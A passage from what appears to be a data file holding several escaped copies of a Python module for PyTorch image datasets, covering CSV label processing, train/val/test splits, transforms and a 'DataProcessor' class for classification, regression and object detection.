z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\ndef extract_data(dt):\n x = []\n y = []\n for a, b in dt:\n x.append(a)\n y.append(b)\n return x, y\n\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)]\n\n\ndef get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\ndef csv_from_path(path, img_dest):\n path = Path(path)\n img_dest = Path(img_dest)\n labels_paths = list(path.iterdir())\n tr_images = []\n tr_labels = []\n for l in labels_paths:\n if l.is_dir():\n for i in list(l.iterdir()):\n if i.suffix in IMG_EXTENSIONS:\n name = i.name\n label = l.name\n new_name = '{}_{}'.format(path.name, name)\n new_path = img_dest / new_name\n os.rename(i, new_path)\n tr_images.append(new_name)\n tr_labels.append(label)\n tr_img_label = {'Img': tr_images, 'Label': tr_labels}\n csv = pd.DataFrame(tr_img_label, columns=['Img', 'Label'])\n csv = csv.sample(frac=1).reset_index(drop=True)\n return csv\n\n\ndef add_extension(a, e):\n a = [(x + e) for x in a]\n return a\n\n\ndef one_hot(targets, multi=False):\n if multi:\n binerizer = MultiLabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n else:\n binerizer = LabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n return dai_1hot, binerizer.classes_\n\n\ndef get_index(arr, a):\n for i in range(len(arr)):\n if sum(arr[i] == a) == len(a):\n return i\n return False\n\n\ndef rescale_bbox(bb, row_scale, col_scale):\n bb = bb.reshape((-1, 4))\n for b in bb:\n r1, c1, r2, c2 = b\n b[0] = int(np.round(r1 * col_scale))\n b[1] = int(np.round(c1 * row_scale))\n b[2] = int(np.round(r2 * col_scale))\n b[3] = int(np.round(c2 * row_scale))\n bb = bb.reshape((1, -1))\n return bb\n\n\ndef get_img_stats(dataset, sz):\n size = int(len(dataset) * sz)\n i = 0\n imgs = []\n for img, _ in dataset:\n if i > size:\n break\n imgs.append(img)\n i += 1\n imgs_ = torch.stack(imgs, dim=3)\n imgs_ = imgs_.view(3, -1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean, imgs_std\n\n\ndef split_df(train_df, test_size=0.15):\n try:\n train_df, val_df = train_test_split(train_df, test_size=test_size,\n random_state=2, stratify=train_df.iloc[:, 1])\n except:\n train_df, val_df = train_test_split(train_df, test_size=test_size,\n random_state=2)\n train_df = train_df.reset_index(drop=True)\n val_df = val_df.reset_index(drop=True)\n return train_df, val_df\n\n\ndef save_obj(obj, path):\n with open(path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef load_obj(path):\n with open(path, 'rb') as f:\n return pickle.load(f)\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\ndef extract_data(dt):\n x = []\n y = []\n for a, b in dt:\n x.append(a)\n y.append(b)\n return x, y\n\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)]\n\n\ndef get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\ndef csv_from_path(path, img_dest):\n path = Path(path)\n img_dest = Path(img_dest)\n labels_paths = list(path.iterdir())\n tr_images = []\n tr_labels = []\n for l in labels_paths:\n if l.is_dir():\n for i in list(l.iterdir()):\n if i.suffix in IMG_EXTENSIONS:\n name = i.name\n label = l.name\n new_name = '{}_{}'.format(path.name, name)\n new_path = img_dest / new_name\n os.rename(i, new_path)\n tr_images.append(new_name)\n tr_labels.append(label)\n tr_img_label = {'Img': tr_images, 'Label': tr_labels}\n csv = pd.DataFrame(tr_img_label, columns=['Img', 'Label'])\n csv = csv.sample(frac=1).reset_index(drop=True)\n return csv\n\n\ndef add_extension(a, e):\n a = [(x + e) for x in a]\n return a\n\n\ndef one_hot(targets, multi=False):\n if multi:\n binerizer = MultiLabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n else:\n binerizer = LabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n return dai_1hot, binerizer.classes_\n\n\ndef get_index(arr, a):\n for i in range(len(arr)):\n if sum(arr[i] == a) == len(a):\n return i\n return False\n\n\ndef rescale_bbox(bb, row_scale, col_scale):\n bb = bb.reshape((-1, 4))\n for b in bb:\n r1, c1, r2, c2 = b\n b[0] = int(np.round(r1 * col_scale))\n b[1] = int(np.round(c1 * row_scale))\n b[2] = int(np.round(r2 * col_scale))\n b[3] = int(np.round(c2 * row_scale))\n bb = bb.reshape((1, -1))\n return 